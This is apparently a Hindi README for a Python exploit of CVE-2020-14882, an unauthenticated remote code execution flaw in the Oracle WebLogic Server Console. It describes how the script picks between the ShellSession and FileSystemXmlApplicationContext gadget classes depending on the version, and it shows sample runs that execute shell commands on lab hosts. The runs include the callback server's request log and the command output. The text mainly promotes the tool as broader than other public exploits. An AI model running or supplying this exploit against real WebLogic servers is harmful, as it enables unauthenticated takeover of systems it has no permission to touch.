
CVE-2020-14882
CVE-2020-14882
Oracle Fusion Middleware के Oracle WebLogic Server उत्पाद में कमजोरी (घटक: Console)। प्रभावित समर्थित संस्करण 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 और 14.1.1.0.0 हैं। आसानी से शोषण योग्य कमजोरी एक अप्रमाणित हमलावर को HTTP के माध्यम से नेटवर्क पहुंच के साथ Oracle WebLogic Server से समझौता करने की अनुमति देती है। इस कमजोरी के सफल हमले Oracle WebLogic
Oracle WebLogic संस्करण 12.2.1 से पहले के लिए, हमें क्लास 'com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' का उपयोग करना होगा क्योंकि क्लास 'com.tangosol.coherence.mvel2.sh.ShellSession' उपलब्ध नहीं है। स्क्रिप्ट संस्करणों का पता लगाने के आधार पर कमांड निष्पादन के लिए स्वचालित रूप से दो क्लासों के बीच स्विच करती है।
CVE-2020-14882 का शोषण करने के लिए Github पर उपलब्ध कुछ वर्तमान स्क्रिप्ट केवल क्लास 'com.tangosol.coherence.mvel2.sh.ShellSession' का समर्थन करती हैं, जिसका अर्थ है कि ये स्क्रिप्ट WebLogic संस्करण 10.3.6.0.0 और 12.1.3.0.0 पर विफल हो जाएंगी।
% python3 CVE-2020-14882.py -u http://172.16.164.134:7001 -c 'uname -r > /tmp/success' -i 172.16.164.1
[*] http://172.16.164.134:7001/console/login/LoginForm.jsp [version 12.1.3.0.0]
[*] Using: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
% python3 CVE-2020-14882.py -u http://127.0.0.1:7001 -c 'uname -r' -i 172.16.164.1
http://127.0.0.1:7001/console/login/LoginForm.jsp
[*] http://127.0.0.1:7001/console/login/LoginForm.jsp [version 12.2.1.3.0]
[*] Using: com.tangosol.coherence.mvel2.sh.ShellSession
Linux 96fc5d43736b 4.19.121-linuxkit #1 SMP Tue Dec 1 17:50:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux